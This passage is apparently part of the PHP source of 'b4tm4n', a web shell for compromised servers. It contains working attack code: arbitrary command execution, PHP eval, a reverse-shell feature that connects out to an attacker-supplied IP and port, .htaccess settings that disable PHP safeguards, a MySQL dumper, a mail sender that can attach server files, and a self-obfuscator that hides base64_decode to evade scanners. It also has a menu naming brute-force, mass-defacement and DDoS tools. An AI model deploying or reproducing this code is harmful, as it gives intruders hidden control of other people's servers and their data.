    "); + + $cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID', + 'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI', + 'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON', + 'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR', + 'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR', + 'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR', + 'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE'); + + $table=""; + foreach($cores as $core) + { + $table.="".$core."".@constant($core).""; + } + + printf("

    Core Predefined Constants


    + + + + + + + %s +
    Predefined ConstantsValue
    ",$table); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment") + { + ob_clean(); + phpinfo($_REQUEST['config']); + $phpinfo=ob_get_contents(); + ob_end_clean(); + $phpinfo=preg_replace('%^.*(.*).*$%ms','$1',$phpinfo); + printf("
    %s
    ",$phpinfo); + exit; + } + } + if($_REQUEST['x']=="db") + { + $connect=any("connect",$_SESSION)?$_SESSION['connect']:""; + $status=any("status",$_SESSION)?$_SESSION['status']:""; + $query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;"; + + if($connect==true) + { + $process=""; + $sql=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']); + /* + $result=mysql_list_processes($sql); + while($row=mysql_fetch_assoc($result)) + { + $process.=sprintf(" + %s%s%s + %s%s", + $row["Id"],$row["Host"],$row["db"], + $row["Command"],$row["Time"]); + } + mysql_free_result($result); + */ + + printf("
    +
    +
    +
    + +
    + + +
    +
    +
    + +
    + +

    +
    +
    + + +
    +
    +
    +
    +
    + ",$query,$process,$dir,$status); + + } + else + { + printf("
    +

    +
    +
    +
    +
    +
    + +
    +
    "); + } + + if(any("rs",$_REQUEST)) + { + $_SESSION[$_REQUEST['rs']]=''; + } + + if(any("cd",$_REQUEST)) + { + $_SESSION['qdb']=$_REQUEST['cd']; + } + + if(any("ct",$_REQUEST)) + { + $_SESSION['qtb']=$_REQUEST['ct']; + } + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db") + { + $cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']); + + $_SESSION['host']=$_REQUEST['host']; + $_SESSION['port']=$_REQUEST['port']; + $_SESSION['user']=$_REQUEST['user']; + $_SESSION['pass']=$_REQUEST['pass']; + $_SESSION['dbas']=$_REQUEST['dbas']; + + if($cn) + { + $_SESSION['connect']=true; + header('location:'.php_self.'?x=db'); + } + else + { + $_SESSION['connect']=false; + printf("Connection Failed"); + } + } + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry") + { + $_SESSION['status']=''; + $con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']); + + if(isset($_REQUEST['disconnect'])) + { + mysqli_close($con); + unset($_SESSION['connect']); + unset($_SESSION['query']); + unset($_SESSION['host']); + unset($_SESSION['user']); + unset($_SESSION['pass']); + unset($_SESSION['dbas']); + unset($_SESSION['qdb']); + unset($_SESSION['qtb']); + header('location:'.php_self.'?x=db'); + } + + $sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;"; + $result=mysqli_query($con,$sql); + $data=array(); + $name=array(); + + if($result) + { + while($fieldinfo=mysqli_fetch_field($result)) + { + $name[]=$fieldinfo->name; + } + $data[]=$name; + while($row=mysqli_fetch_row($result)) + { + $data[]=$row; + } + mysqli_free_result($result); + } + else + { + $data=false; + } + + if($data!==false) + { + $sqdb=isset($_SESSION['qdb']) ? $_SESSION['qdb'] : ''; + $sqtb=isset($_SESSION['qtb']) ? $_SESSION['qtb'] : ''; + + $bsdb="Database"; + $bqdb=!empty($_SESSION['qdb'])?"→ $sqdb":""; + $bqtb=!empty($_SESSION['qtb'])?"→ $sqtb":""; + + printf("
    +
    %s %s %s
    +
    + ",$bsdb,$bqdb,$bqtb); + + foreach($data as $key => $val) + { + if(is_array($val)) + { + if($key==0) + { + print ""; + foreach($val as $key2 => $val2) + { + if(!is_array($val2)) + { + print ""; + } + } + print ""; + } + else + { + print ""; + foreach($val as $key3 => $val3) + { + if(!is_array($val3)) + { + if(strpos($val2,'Database')!==false) + { + print ""; + } + elseif(strpos($val2,'Tables')!==false) + { + $val4=substr($val2,strpos($val2,'Tables_in_')+10); + print ""; + } + else + { + print ""; + } + } + } + print ""; + } + } + } + print "
    ".$val2."
    $val3$val3$val3
    "; + } + else + { + print 'Query not Executed'; + } + } + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp") + { + $database=$_REQUEST['database']; + $output=$_REQUEST['output']; + if (!file_exists($output)&&!empty($database)) + { + $link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']); + mysqli_set_charset($link,'utf8'); + mysqli_select_db($link,$database); + $tables=array(); + $result=mysqli_query($link,'SHOW TABLES'); + while($row=mysqli_fetch_row($result)) + { + $tables[]=$row[0]; + } + $return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n"; + $return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n"; + $return.='SET AUTOCOMMIT=0;' . "\r\n"; + $return.='START TRANSACTION;' . "\r\n"; + foreach($tables as $table) + { + $result=mysqli_query($link,'SELECT * FROM '.$table); + $num_fields=mysqli_num_fields($result); + $num_rows=mysqli_num_rows($result); + $i_row=0; + $row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table)); + $return.="\n\n".$row2[1].";\n\n"; + if ($num_rows!==0) { + $row3=@mysqli_fetch_fields($result); + $return.='INSERT INTO '.$table.'( '; + foreach ($row3 as $th) + { + $return.='`'.$th->name.'`,'; + } + $return=substr($return,0,-2); + $return.=' ) VALUES'; + for ($i=0;$i < $num_fields;$i++) + { + while($row=mysqli_fetch_row($result)) + { + $return.="\n("; + for($j=0;$j<$num_fields;$j++) + { + $row[$j]=addslashes($row[$j]); + $row[$j]=preg_replace("#\n#","\\n",$row[$j]); + if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';} + if ($j<($num_fields-1)) { $return.=',';} + } + if (++$i_row==$num_rows) { + $return.=");"; + }else { + $return.="),"; + } + } + } + } + $return.="\n\n\n"; + } + $return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n"; + $return.='COMMIT;'; + $output=pathinfo($otput)['extension']=='sql'?$output:$output.'.sql'; + $handle=fopen($output,'w+'); + fwrite($handle,$return); + fclose($handle); + $_SESSION['status']=sprintf("Dump with success... '%s'",urle($output),basename($output)); + } + else + { + $_SESSION['status']="Dump Error"; + } + + header('location:'.php_self.'?x=db'); + } + + } + if($_REQUEST['x']=="terminal") + { + printf(" +
    + +
    + + +
    +
    ",Execute('whoami'),$dir); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals") + { + ob_clean(); + $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami"; + @chdir($dir); + $charset='UTF-8'; + if(!Unix()) + { + $charset='Windows-1251'; + } + $ret=iconv($charset,'UTF-8',Execute($command)); + print $ret; + exit; + } + elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir") + { + ob_clean(); + $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami"; + if (preg_match('/cd (.*)/',$command,$dirx)) + { + if ($dirx[1]=='..') + { + $dir=substr($dir,0,strrpos($dir,_)); + if (strlen($dir)<=2) $dir=$dir._; + } + else + { + if (is_dir($dirx[1])) + { + $dir=realpath($dirx[1]); + } + } + } + $_SESSION['c']=urle($dir); + print '$ '.$dir.':'; + exit; + } + } + if($_REQUEST['x']=="connect") + { + printf("
    +
    +
    +
    + Reverse Connect +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    +
    + Status +
    Terminal: %s", + remote_addr,Execute('whoami') + ); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="reverse-connect") + { + if($_REQUEST['socket']=="fsockopen") + { + $host=$_REQUEST['reverse-ip']; + $port=$_REQUEST['reverse-port']; + $sock=@fsockopen($host,$port,$errno,$errstr); + if($errno!=0) + { + printf("%s:%s",$errno,$errstr); + } + else + { + while(!feof($sock)) + { + fwrite($sock,"[b4tm4n]:"); + $command=fgets($sock,1024); + if(trim($command)=='quit'||trim($command)=='exit') + { + fclose($sock); + printf($command); + exit; + } + fwrite($sock,Execute($command)); + } + fclose($sock); + } + } + else if($_REQUEST['socket']=="socket_create") + { + $host=$_REQUEST['reverse-ip']; + $port=$_REQUEST['reverse-port']; + $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); + socket_set_nonblock($sock); + if(!$sock) + { + printf("Connection Error"); + } + else + { + while(!@socket_connect($sock,$host,$port)) + { + @socket_write($sock,"[b4tm4n]:",strlen ("[b4tm4n]:")); + $input=@socket_read($sock,1024,PHP_NORMAL_READ); + if (trim($input)=='quit'||trim($input)=='exit') + { + socket_set_block($sock); + socket_close($sock); + printf($input); + exit; + } + @socket_write($sock,Execute($input),strlen (Execute($input))); + } + socket_set_block($sock); + socket_close($sock); + } + } + else if($_REQUEST['socket']=="stream_socket_client") + { + $host=$_REQUEST['reverse-ip']; + $port=$_REQUEST['reverse-port']; + $sock=@stream_socket_client("tcp://$host:$port",$errno,$errstr); + if (!$sock) + { + printf("%s:%s",$errno,$errstr); + } + else + { + while(!feof($sock)) + { + fwrite($sock,"[b4tm4n]:"); + $command=fgets($sock,1024); + if(trim($command)=='quit'||trim($command)=='exit') + { + fclose($sock); + printf($command); + exit; + } + fwrite($sock,Execute($command)); + } + fclose($sock); + } + } + } + printf("
    "); + } + if($_REQUEST['x']=="htaccess") + { + $php_ini=array( + "php_value upload_max_filesize 32M", + "php_value post_max_size 32M", + "php_flag safe_mode Off", + "php_value disable_functions null", + "php_flag safe_mode_gid Off", + "php_value open_basedir $dir", + "php_flag register_globals On", + "php_flag exec On", + "php_flag shell_exec On"); + + $htaccess=array( + "Options All", + "Allow From All", + "Satisfy Any"); + + printf(" +
    +
    + +
    +
    + +
    +
    ",implode($php_ini,"\n"),implode($htaccess,"\n")); + } + if($_REQUEST['x']=="php") + { + $exp=array( + "print_r(get_extension_funcs('Core'));", + "print_r(get_loaded_extensions());", + "print_r(ini_get_all('pcre'));", + "print_r(ini_get_all());", + "print_r(get_defined_constants());", + "print_r(get_defined_functions());", + "print_r(get_declared_classes());"); + + printf("
    +
    +
    + +
    +
    + +
    + + +
    +
    ",implode($exp,"\n")); + + if(any("code",$_REQUEST)) + { + ob_clean(); + $code=trim($_REQUEST['code']); + $evil=Evil($code); + exit; + } + if(any("codex",$_REQUEST)) + { + ob_clean(); + $code=trim($_REQUEST['codex']); + $evil=Evil($code,true); + exit; + } + } + if($_REQUEST['x']=="perl") + { + print 'PHP Perl Class: '.(class_exists('Perl')?"ON":"OFF").'
    '; + + if(Unix()) + { + if(file_exists("/usr/bin/perl")) + { + $path_perl="/usr/bin/perl"; + } + else + { + $path_perl="/usr/bin/env perl"; + } + } + else + { + if(file_exists("C:\\perl\bin\perl.exe")) + { + $path_perl="C:\\perl\bin\perl.exe"; + } + elseif(file_exists("C:\\wamp\bin\perl.exe")) + { + $path_perl="C:\\wamp\bin\perl.exe"; + } + elseif(file_exists("C:\\xampp\perl\bin\perl.exe")) + { + $path_perl="C:\\xampp\perl\bin\perl.exe"; + } + } + + $script=array( + "#!$path_perl", + "use strict;", + "use warnings;", + "use CGI;", + "print CGI::header();", + "print 'k4mpr3t on CGI';"); + + $htaccess=array( + "Options +ExecCGI +SymLinksIfOwnerMatch", + "DirectoryIndex index.ler", + "AddType application/x-httpd-cgi .ler", + "AddHandler cgi-script .ler"); + + $path=$dir._.'cgi-bin'; + $file=$path._.'perl.ler'; + $file2=$path._.'.htaccess'; + + $scripts=implode($script,"\n"); + $htaccesss=implode($htaccess,"\n"); + + if(!is_dir($path)) + { + mkdir($path,0755); + } + if(!is_file($file)) + { + $op=fopen($file,'w+'); + fwrite($op,$scripts); + fclose($op); + chmod($file,0755); + } + if(!is_file($file2)) + { + $op=fopen($file2,'w+'); + fwrite($op,$htaccesss); + fclose($op); + chmod($file2,0755); + } + + $redirect=GetUrlFromPath($file); + printf("Tested -> Link"); + + if (class_exists('Perl')) + { + //$perl=Perl::getInstance(); + $perl=new Perl(); + $perl->eval("print \"Executing Perl code in PHP\n\""); + print "Hello from PHP! "; + + //$perl=new Perl(); + $perl->require($file); + $val=$perl->somePhpFunc('test'); + print $val; + } + } + if($_REQUEST['x']=="mail") + { + printf(" + +
    +
    +
    + Mail +
    +
    +
    +
    +
    +
    +
    +
    +
    + +
    +
    +
    +
    +
    + Result's +
    +
    +
    +
    + + ",php_self); + + if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send') + { + ob_clean(); + $from=$_REQUEST['from']; + $reply=$_REQUEST['reply']; + $to=$_REQUEST['to']; + $cc=$_REQUEST['cc']; + $bcc=$_REQUEST['bcc']; + $subject=$_REQUEST['subject']; + $msg=$_REQUEST['message']; + $attachment=$_REQUEST['attachment']; + $uid=md5(uniqid(time())); + + $headers[]="From: $from"; + $headers[]="Reply-To: $reply"; + $headers[]="To: $to"; + if(!empty($cc)) $headers[]='Cc: $cc'; + if(!empty($bcc)) $headers[]='Bcc: $bcc'; + $headers[]="MIME-Version: 1.0"; + $headers[]="Content-Type: multipart/mixed; boundary=\"$uid\""; + + $messages[]="--$uid"; + $messages[]="Content-type: text/html; charset=\"iso-8859-1\""; + $messages[]="Content-Transfer-Encoding: 8bit"; + $messages[]=""; + $messages[]="$msg"; + $messages[]=""; + + if(is_file($attachment)) + { + $content=file_get_contents($attachment); + $content=chunk_split(B64E($content)); + $name=basename($attachment); + $mime=mime_content_type($attachment); + + $messages[]="--$uid"; + $messages[]="Content-Type: $mime; name=\"$name\""; + $messages[]="Content-Transfer-Encoding: base64"; + $messages[]="Content-Disposition: attachment"; + $messages[]=""; + $messages[]="$content"; + $messages[]=""; + $messages[]="--$uid--"; + } + + $message=implode("\r\n",$messages); + $header=implode("\r\n",$headers); + + if(mail($to,$subject,$message,$header)) + { + print "Email Send"; + } + else + { + $error=error_get_last(); + print "Error :" . $error['message']; + } + exit; + } + } + if($_REQUEST['x']=='process') + { + printf("
    + +
    + + +
    "); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill") + { + $pid=$_REQUEST['pid']; + $name=$_REQUEST['name']; + + if(Unix()) + { + $kill=Execute("kill 9 $pid"); + $kill=Execute("kill 9 $name"); + if($kill) print 'Process Killed'; + } + else + { + $kill=Execute("taskkill /f /pid $pid"); + $kill=Execute("taskkill /f /im $name"); + if($kill) print 'Process Killed'; + } + } + + if(Unix()) + { + $ret=iconv('UTF-8','UTF-8',Execute('ps aux')); + print '
    '.$ret.'
    '; + } + else + { + $ret=iconv('Windows-1251','UTF-8',Execute('tasklist')); + print '
    '.$ret.'
    '; + } + } + if($_REQUEST['x']=='shells') + { + print "Coming Soon"; + } + if($_REQUEST['x']=='symlink') + { + print "Coming Soon"; + } + if($_REQUEST['x']=="account") + { + printf("
    +
    +
    + +
    ",B64D($account[0])); + + if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change") + { + $filename=script_filename; + $username=$_REQUEST['change-password']; + $password=$_REQUEST['change-username']; + + if (!empty($username)&&!empty($password)) + { + $user_from=$account[0]; + $user_to=B64E($password); + $content=file_get_contents($filename); + $chunk=explode($user_from,$content); + $content=implode($user_to,$chunk); + $change=file_put_contents($filename,$content); + + $pass_from=$account[1]; + $pass_to=sha1(md5($username)); + $content=file_get_contents($filename); + $chunk=explode($pass_from,$content); + $content=implode($pass_to,$chunk); + $change=file_put_contents($filename,$content); + + if($change) + { + session_destroy(); + session_regenerate_id(); + header('location:'.php_self); + } + else + { + printf("Error change account"); + } + } + else + { + printf("Mistakes !"); + } + } + } + if($_REQUEST['x']=="action") + { + $files=any('chk',$_REQUEST)?$_REQUEST['chk']:array(); + $value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option']; + $tmp=""; + $row=""; + $count_dirs=0; + $count_files=0; + + foreach($files as $file) + { + if(is_dir(urld($file))) + { + $count_dirs++; + } + if(is_file(urld($file))) + { + $count_files++; + } + + $row.="".urld($file).""; + $tmp.=urld($file).","; + } + + if(count($files)==1&&$value=='copy') + { + header('location:'.php_self.'?a=cp&r='.$files[0]); + } + + if(count($files)==1&&$value=='move') + { + header('location:'.php_self.'?a=mv&r='.$files[0]); + } + + if(!any('xa',$_REQUEST)&&$value=='delete') + { + printf("

    Dir's: [%s] File's: [%s]

    + %s
    +
    + + + +
    ", + $count_dirs, + $count_files, + $row, + $value, + $tmp); + } + + if(!any('xa',$_REQUEST)&&$value!='delete') + { + printf("

    Dir's: [%s] File's: [%s]

    + %s
    +
    + + + -> + + + +
    ", + $count_dirs, + $count_files, + $row, + $value, + $tmp, + $dir._); + } + + if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option') + { + $files=array_filter(explode(',',$_REQUEST['tmp'])); + $newloc=trim(@$_REQUEST['newloc']); + $succ=0; + $fail=0; + + if($_REQUEST['action-option']=='copy') + { + if(file_exists($newloc)&&is_dir($newloc)) + { + foreach($files as $file) + { + if(CopyRecursive($file,rtrim($newloc,_)._.basename($file))) + { + $succ++; + } + else + { + $fail++; + } + } + print "Success: $succ | Failed: $fail"; + } + else + { + print "Target not exists !"; + } + } + + if($_REQUEST['action-option']=='move') + { + if(file_exists($newloc)&&is_dir($newloc)) + { + foreach($files as $file) + { + if(MoveRecursive($file,rtrim($newloc,_)._.basename($file))) + { + $succ++; + } + else + { + $fail++; + } + } + print "Success: $succ | Failed: $fail"; + } + else + { + print "Target not exists !"; + } + } + + if($_REQUEST['action-option']=='delete') + { + foreach($files as $file) + { + if(Remove($file)) + { + $succ++; + } + else + { + $fail++; + } + } + print "Success: $succ | Failed: $fail"; + } + + if($_REQUEST['action-option']=='zip') + { + if(pathinfo($newloc)['extension']=='zip') + { + $zip=new ZipArchive; + + if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE) + { + foreach($files as $file) + { + if(is_dir($file)) + { + $zip->addEmptyDir(basename($file)); + + $recur=new RecursiveIteratorIterator( + new RecursiveDirectoryIterator($file), + RecursiveIteratorIterator::LEAVES_ONLY + ); + + foreach ($recur as $key => $val) + { + if(basename($key)!="..") + { + if(is_dir($key)) + { + $zdir=str_replace($file,basename($file),realpath($key)); + $zip->addEmptyDir($zdir); + } + elseif(is_file($key)) + { + $zfile=str_replace($file,basename($file),realpath($key)); + $zip->addFile(realpath($key),$zfile); + } + } + } + } + elseif(is_file($file)) + { + $zip->addFile($file,basename($file)); + } + } + + $zip->close(); + print 'Zip Created'; + } + else + { + print 'Failed'; + } + } + else + { + print 'Extension must Zip'; + } + } + + if($_REQUEST['action-option']=='unzip') + { + if(file_exists($newloc)&&is_dir($newloc)) + { + foreach($files as $file) + { + if(pathinfo($newloc)['extension']=='zip') + { + $zip=new ZipArchive; + + if ($zip->open($file)===TRUE) + { + $zip->extractTo($newloc); + $zip->close(); + $succ++; + } + else + { + $fail++; + } + } + else + { + $fail++; + } + + } + print "Success: $succ | Failed: $fail"; + } + else + { + print "Target not exists !"; + } + } + } + } + if($_REQUEST['x']=="find") + { + $recur=new RecursiveIteratorIterator( + new RecursiveDirectoryIterator($dir), + RecursiveIteratorIterator::LEAVES_ONLY + ); + + if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value'])) + { + $result=""; + $res_=0; + + foreach ($recur as $key => $val) + { + if(basename($key)!="..") + { + if(strpos(realpath($key),$_REQUEST['find-value'])!== false) + { + $result.=sprintf(" + + %s + %s +
    %s
    + ", + substr(realpath($key),0,strrpos(realpath($key),_)), + substr(realpath($key),0,strrpos(realpath($key),_)), + substr(realpath($key),0,strrpos(realpath($key),_)), + realpath($key), + realpath($key), + basename(realpath($key)), + GetFileTime(realpath($key),'modify') + ); + + $res_++; + } + } + } + + printf(" +
    + + +
    +
    + + + + + + + + + %s +
    No.DirectoryNameModified
    +
    ",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result); + } + else + { + print "
    + + +
    "; + } + } + if($_REQUEST['x']=="update") + { + $link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php'; + $current_version=2.7; //New Version Released + + if($config['debug']==true) + { + $latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1 + } + else + { + $git_script=GetUrlContent($link_update); + $get_version=strpos($git_script,"current_version"); + $version=substr($git_script,$get_version+16,3); + $latest_version=is_numeric($version)?$version:$current_version; + } + + $status=""; + if((float)$latest_version>(float)$current_version) + { + if($config['debug']==true) + { + $status.='New Version Available '.$latest_version.'
    Setting Debug to False for Activate this Feature'; + } + else + { + $status.='New Version Available '.$latest_version.'
    Download -> [link]'; + } + } + else + { + $status.='Latest Version '.$current_version; + } + + Printf("
    + + +

    %s +
    ",$status); + } + if($_REQUEST['x']=="self-encryptor") + { + if($php_script=htmlentities(@file_get_contents(__FILE__))) + { + $asu=strpos($php_script,$_SESSION["action"]["password"]); + $temp=substr($php_script,$asu+48); + $rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3)); + $rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5)); + $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4"; + $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e"; + $b64e=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m; + $b64d=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_l.$_m.$_j.$_k.$_l.$_m; + $b64=array( + '"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"', + 'strrev("ed"."oce"."d_4"."6es"."ab")', + 'strrev("e"."doc"."ed_"."46e"."sab")', + '"b"."as"."e6"."4_"."d"."ec"."o"."de"', + '"ba"."se"."6"."4_d"."e"."cod"."e"' + ); + $rand_b64=array_rand($b64); + $rand3=$b64[$rand_b64]; + $var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";'; + $var2=$rand2.'='.$rand3.';'; + $var=array( + $var1.$var2, + $var2.$var1 + ); + $rand_var=array_rand($var); + $rand4=$var[$rand_var]; + $self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random + $src_=''; + $src_.=''; + $name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php'; + $file=dirname(__FILE__)._.$name; + $op=fopen($file,'w+'); + fwrite($op,$src_); + fclose($op); + printf("
    SELF ENCRYPT CREATED !!!
    +
    + Link -> %s +
    ",GetUrlFromPath($file),$name); + } + else + { + print "
    SELF ENCRYPT ENABLE !!!
    "; + } + } +} + +/* START CUSTOM TOOLZ */ +if(any("z",$_REQUEST)) +{ + $z=$_REQUEST['z']; + + print MenuTools(array( + "target-map"=>array("title"=>"Target Map","ver"=>"2.0","auth"=>"k4mpr3t"), + "port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"), + "script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"), + "encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"), + "form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"), + "login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"), + "mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"), + "ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"), + )); + + print "
    "; + + if(empty($z)) + { + printf("
    +

    Nothing Is Secure...

    +

    WHY SO serious ?!

    +
    "); + } + if($z=="target-map") + { + print "
    +

    ".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."

    +

    by: ".$menu_tools[$z]['auth']."

    +
    "; + + printf("
    +
    + +
    +
    +
    +
    ",gethostbyname(http_host)); + + if(any("ip",$_REQUEST)) + { + ob_clean(); + $ip=!empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host); + $valid=filter_var($ip,FILTER_VALIDATE_IP) or die('Invalid IP Address'); + if($_REQUEST['ip']==gethostbyname(http_host)) + { + $url=B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1="); + $geoip=GetUrlContent($url); + $json=json_decode($geoip,true); + } + else + { + $url=sprintf(B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=")."%s",$ip); + $geoip=GetUrlContent($url); + $json=json_decode($geoip,true); + } + $url=sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa")."?q=%s,%s&z=10&output=embed",$json['lat'],$json['lon']); + printf("
    +
    + + + + + + + + +
    AS%s
    City%s
    Country%s
    Country Code%s
    ISP%s
    Latitude%s
    Logitude%s
    +
    +
    + + + + + + + + +
    Origin%s
    IP%s
    Region%s
    Region Name%s
    Timezone%s
    Zip%s
    Status%s
    +
    +
    +